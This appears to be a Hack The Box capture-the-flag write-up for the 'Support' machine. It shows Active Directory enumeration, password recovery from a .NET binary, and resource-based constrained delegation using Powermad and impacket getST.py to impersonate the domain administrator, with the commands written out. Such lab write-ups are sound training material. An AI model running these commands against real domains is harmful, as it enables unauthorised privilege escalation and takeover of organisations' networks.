C R E A T E & D E S T R OY

Support | Hack The Box

PORT     STATE SERVICE       VERSION                                                                                                                             
53/tcp   open  domain        Simple DNS Plus                                                                                                                     
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-09-26 14:12:20Z)                                                                      
135/tcp  open  msrpc         Microsoft Windows RPC                                                                                                               
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                       
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)                                      
445/tcp  open  microsoft-ds?                                                                                                                                     
464/tcp  open  kpasswd5?                                                                                                                                         
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Initial nmap results and looks like we’ve got a domain controller.

We get nothing we don’t already know from the DNS server and it’s not vulnerable to anything I know of so on to enumerate SMB.

smbmap -H -u anonymous
[+] Guest session       IP:   Name: support.htb                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        support-tools                                           READ ONLY       support staff tools
        SYSVOL                                                  NO ACCESS       Logon server share 
smb: \> ls                                                                                                                                                       
  .                                   D        0  Wed Jul 20 18:01:06 2022                                                                                       
  ..                                  D        0  Sat May 28 12:18:25 2022                                                                                       
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 12:19:19 2022                                                                                       
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 12:19:55 2022                                                                                       
  putty.exe                           A  1273576  Sat May 28 12:20:06 2022                                                                                       
  SysinternalsSuite.zip               A 48102161  Sat May 28 12:19:31 2022                                                                                       
  UserInfo.exe.zip                    A   277499  Wed Jul 20 18:01:07 2022                                                                                       
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 12:20:17 2022                                                                                       
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 12:19:43 2022 

At this stage the only folder we can get into as anonymous user is support-tools which contains a handy bunch of files, but we also have read access over IPC$ which means with anonymous user we might be able to grab some creds with lookupsid.py from impacket.

None of these return ASREP hashes, so I’ll have a look at the SMB share. The only file that stands out is UserInfo.exe.zip. I’m not sure what it so I’ll analyse it.

I analyse it in dnSpy, as it’s a .NET file and am able to get out some password information, the exe is decrypting a string before authing to the server.

While continuing to poke around I realise since the binary is authenticating to the server using /etc/hosts to resolve support.htb, as I test I point /etc/hosts back to my Kali VM and open up Responder…

We’re also able to grab the NTLM hash. Not as useful as having the password so back to dnSpy and setting a break point in the debugger at the point the software makes a call for the password.

Here we can see the decrypted password for the user ldap we can see they’ve a bit more access to SMB but we get errors trying to connect.

Since we’re the LDAP user, let’s enumerate LDAP.

ldapsearch -x -H ldap://support.htb -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=support,DC=htb" > ldapsearch

Dumping all the data to a txt file to make it less painful to read, eventually we come across the support user with an interesting note.

This looks like a password, and with this we can EvilWinRM into the box.

First thing I’ll do is get SharpHound and Bloodhound done to enumerate the Domain.

Okay so it looks like we might be able to perform Kerberos Resource-based Constrained Delegation on the DC.
Get-DomainObject -Identity "dc=support,dc=htb" -Domain support.htb 
ms-ds-machineaccountquota                   : 10
Get-NetComputer dc | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity

name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------

We have write access to the computer, and it doesn’t have msds-allowedtoactonbehalfofotheridentity enabled.

Using Powermad.ps1 we’ll add the new machine account.

New-MachineAccount -MachineAccount CACK01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Verbose: [+] Domain Controller = dc.support.htb
Verbose: [+] Domain = support.htb
Verbose: [+] SAMAccountName = CACK01$
Verbose: [+] Distinguished Name = CN=CACK01,CN=Computers,DC=support,DC=htb
[+] Machine account CACK01 added

Now we can grab its SID to create raw security descriptors.

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5601)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Now to grab a hash of our password (123456) from Rubeus

Now we can use this to generate a ticket.

python3 /opt/impacket/examples/getST.py support.htb/CACK01 -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey 
export KRB5CCNAME=administrator.ccache

Support was a great box, I really enjoyed enumerating the services. I’m starting to understand Reverse Engineering more and always welcome an opportunity to graph a domain with BloodHound!

Leave a Reply

Your email address will not be published. Required fields are marked *